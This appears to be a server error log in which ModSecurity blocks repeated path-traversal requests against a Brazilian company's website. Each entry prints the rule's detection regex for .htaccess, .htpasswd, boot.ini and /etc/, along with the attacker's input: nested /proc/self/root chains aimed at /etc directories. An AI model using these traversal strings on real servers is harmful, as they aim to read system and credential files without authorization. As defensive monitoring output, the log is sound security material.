[Mon Mar 16 16:48:32.697911 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:32876] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhekLABkC4fWIHEf8EHNwAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:37.279258 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:51216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhelbysWC90G-1nBrBX1gAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:48:39.666978 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:32890] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhel7ABkC4fWIHEf8EHSQAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:40.951185 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.243.203:35416] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhemM_BxrYCr4hPDw_-MwAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:42.136619 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:37872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhemrABkC4fWIHEf8EHTgAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:48:48.782448 2026] [:error] [pid 29802:tid 140411716749056] [client 74.7.241.46:37874] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhen8_BxrYCr4hPDw_-OAAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:57.256036 2026] [:error] [pid 29507:tid 140411699963648] [client 74.7.243.203:35418] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheqUr9dMAiw-8KANNbAAAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:48:57.361192 2026] [:error] [pid 29507:tid 140411540502272] [client 74.7.241.46:36062] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheqUr9dMAiw-8KANNbAQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:58.710319 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.241.46:39030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheqv9ocpUE4ed4uDwGqwAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:59.958905 2026] [:error] [pid 15568:tid 140411691570944] [client 74.7.241.46:39042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheq6QpVkWug9HeOt9JPgAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:01.252128 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.241.46:39046] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abherVajLEzk2WiQ-10nFAAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:02.604729 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:39060] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abherqTCbgAP5jq5TehAtAAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:03.827663 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:39070] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abher_9ocpUE4ed4uDwGrAAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:05.169327 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.241.46:39072] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhesdSswJuvopo3lOhzCAAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:05.359254 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.243.203:50196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhesY6lpbStxTqkSkt-aAAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:49:06.600280 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.241.46:39086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhess_BxrYCr4hPDw_-OgAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:07.971329 2026] [:error] [pid 14895:tid 140411641214720] [client 74.7.241.46:39098] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhes1ajLEzk2WiQ-10nFgAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:10.335635 2026] [:error] [pid 29802:tid 140411574073088] [client 74.7.241.46:43420] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhets_BxrYCr4hPDw_-PgAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:12.902119 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:43436] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheuI6lpbStxTqkSkt-bQAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:49:15.462130 2026] [:error] [pid 29507:tid 140411741927168] [client 74.7.241.46:43452] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheu0r9dMAiw-8KANNbCAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:49:16.779103 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:43466] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhevLABkC4fWIHEf8EHcwAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
